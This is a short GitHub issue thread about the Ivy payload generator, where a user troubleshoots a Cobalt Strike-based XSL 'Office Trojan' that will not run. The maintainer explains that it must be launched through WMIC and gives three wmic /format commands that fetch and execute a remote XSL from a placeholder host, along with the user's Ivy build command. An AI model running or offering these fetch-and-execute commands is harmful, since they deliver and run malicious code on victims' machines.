### ISSUE TITLE
Error generating Office Trojan

### ISSUE THREAD

**Issue by adminfanf** [optiv/Ivy#21]
I am sorry that I cannot open the xxx. XLS file because there is something wrong with the content. What should I do

**Comment by Tylous** [comment]
Could show/tell me how you are executing it. The more details you provide me the easier it is for me to identify the issue.

**Comment by adminfanf** [comment]
I used Cobalt Strike to generate the C language payload and then used Ivy. exe-ix64 stageless64.bin -ix86 stageless32.bin -p Local -o test. XSL -delivery XSL -stageless is generated, but I don't know if the -URL parameter is required

**Comment by Tylous** [comment]
How are you trying to execute the file?

**Comment by adminfanf** [comment]
Runs as an administrator on Windows

**Comment by Tylous** [comment]
That's the problem you cant just write click it. XSL files like that need to be executed with a WMIC command that allows for a format command argument.  When you compiled it, It should of listed something like this:
```
wmic computersystem list full /format:"http://ACME.com/test.xsl"
wmic computersystem list brief /format:"http://ACME.com/test.xsl"
wmic process list brief /format:"http://ACME.com/test.xsl"
```

Those are how you can execute the file.

**Comment by adminfanf** [comment]
Okay, I'll try it. Thank you very much
